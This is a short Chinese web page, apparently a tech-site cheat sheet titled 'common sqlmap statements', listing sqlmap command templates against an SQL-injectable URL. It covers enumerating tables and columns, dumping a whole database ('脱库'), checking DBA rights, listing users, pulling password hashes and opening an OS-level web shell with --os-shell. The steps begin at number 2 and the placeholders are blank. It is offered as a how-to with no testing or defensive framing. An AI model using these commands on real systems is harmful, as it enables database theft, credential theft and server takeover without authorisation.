时间:2021-07-01 10:21:17 帮助过:4人阅读
2.接下来查看表名: sqlmap.py -u 存在注入的URL地址 -D 数据库名 --tables sqlmap.py -u "" -D "" --tables
3.查看字段: sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 --columns sqlmap.py -u "" -D "" -T "" --columns
4.爆字段内容 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名 --dump sqlmap.py -u "" -D "" -T "" -C "" --dump
5.脱库 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名1,列名2 --dump --
threads=10 --start=1 --stop=3 sqlmap.py -u "" -D "" -T "" -C "","" --dump --threads=10 --start=1 --stop=3
python sqlmap.py.py -u 注入地址 --is-dba 判断当前用户是不是DBA
python sqlmap.py.py -u 注入地址 --users 查看当前用户
python sqlmap.py.py -u 注入地址 --passwords 查看密码
python sqlmap.py.py -u 注入地址 --privileges 查看权限
python sqlmap.py.py -u 注入地址 --os-shell 写web shell
sqlmap常用语句
标签:span start bsp nbsp tar read 查看 table 数据库名